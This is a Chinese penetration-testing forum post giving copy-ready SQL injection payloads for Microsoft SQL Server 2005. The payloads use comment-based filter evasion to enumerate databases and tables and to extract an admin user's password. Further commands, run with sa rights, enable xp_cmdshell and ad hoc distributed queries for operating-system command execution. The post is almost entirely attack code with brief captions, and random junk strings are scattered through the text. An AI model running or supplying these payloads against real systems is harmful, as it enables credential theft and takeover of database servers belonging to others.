找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2177|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, K& A' F3 J4 c+ e# \: ^$ H0 R" u5 U6 L
- E% b+ F& T# z- W% d1 {9 l
[Copy to clipboard]CODE:
8 O2 u- J5 V$ u7 o; n/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
) n# S' f) S1 Q1 i( z' T
" }* y( {7 d- ~0 ~! q3 l爆表语句,somedb部份是所要列的数据库,红色数字1累加$ V" O  _* B  i0 |+ \. s# r* U' |
( M  J9 N8 W3 a8 _6 v
7 F& j- b9 H9 N# f5 ?" x* w
[Copy to clipboard]CODE:( u1 j! h" t2 a
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--. C) J/ @" H- p# Z3 e
* u; M: L. r6 [
爆字段语句,爆表admin里user='icerover'的密码段
1 Z. X( g* E& X" Z8 J8 Q" w$ K% E7 e( C. _
3 U) p. R( O7 s( \' S9 w* X3 b# K5 f
[Copy to clipboard]CODE:
- m/ _1 R& Z! n8 b7 d. P( M% i**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--4 d4 E& I; w9 I. K

' l4 j$ w, V( Z6 \" }  n) e; B3 Pmssql2005默认没有开xp_cmdshell的,openrowset也不能用+ c: a/ @3 w4 J6 i: [& `
如果是sa权限,可以这样来开启
: W% i  d4 W3 N2 ?" O开启openrowset5 z6 H: }" b% ^6 `( u2 q2 T
1 |1 c! _7 O% F$ K3 Q6 @

. _) K9 J: _8 z" o' P; b' Y$ t  l[Copy to clipboard]CODE:6 _9 ^+ u: [1 e
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--8 E6 p: u* V( e  q
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--  [3 n7 J0 X9 |0 e. e; ?( O- P
7 @$ h) P5 c$ x  i. k
开启xp_cmdshell) K. a- d; f& [4 I. W( p0 @

* h0 }& b5 _# R$ K( R
  a' r- G( f1 x6 n8 E' y[Copy to clipboard]CODE:) B5 K% X2 a/ i& V, t0 c5 D5 l" }9 l8 I" @
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--/ a$ f; x) B# `! O% V0 N
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--( A% t  K  k3 q- k
$ M+ @( c0 U6 W, `  L" {; c2 }2 H
ok,over~~晚安
3 P6 t5 q' c" [, p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表